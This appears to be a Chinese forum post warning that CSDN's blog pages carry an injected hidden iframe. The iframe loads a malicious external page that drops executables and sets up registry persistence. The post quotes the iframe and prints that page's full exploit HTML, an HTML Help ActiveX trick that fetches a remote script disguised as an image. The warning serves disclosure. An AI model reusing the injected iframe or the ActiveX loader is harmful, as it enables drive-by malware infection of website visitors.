CSDN竟然传播病毒! 进入http://blog.csdn.net会感染病毒!
进入http://blog.csdn.net会感染病毒!
在这一页查看HTML源代码,会发现最底下有
<iframe src=http://www.88joy.com/event/files/image/ad.htm width=0 height=0 frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
这个就是传播病毒的页面!
他会下载并生成一个svchost.exe的文件,并修改C:\autoexec.bat,生成cserver.exe,并修改你的主页,还会修改注册表里的run项,每次启动时病毒就会启动!
用瑞星查瑞星不认为是病毒,但这个行为以经里病毒的行为了!
以下是http://www.88joy.com/event/files/image/ad.htm的HTML代码
<HTML><head><LINK href="ray.exe" rel=stylesheet type=text/css></head><BODY><div style="display:none"><OBJECT id="ray" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:\WINDOWS\Help\apps.chm'></OBJECT><OBJECT id="raystyle" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT src=\\\"http://www.88joy.com/event/files/image/ray.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>ray.Click();setTimeout("raystyle.Click();",0);</SCRIPT></BODY></HTML>